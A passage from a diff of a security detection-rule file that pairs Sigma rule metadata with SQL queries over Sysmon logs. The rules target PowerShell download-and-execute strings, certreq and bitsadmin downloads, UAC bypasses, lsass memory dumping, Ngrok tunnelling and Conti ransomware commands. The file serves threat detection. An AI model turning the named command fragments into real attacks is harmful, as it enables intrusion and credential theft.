"Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + 
"attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "status": "test", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, 
oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", + "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "status": "experimental", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - 
"description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for 
connections.\n", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "status": "experimental", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.credential_access", "attack.defense_evasion", - "attack.t1036" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' 
ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1574.001" ], 
"falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. 
through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. 
This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open 
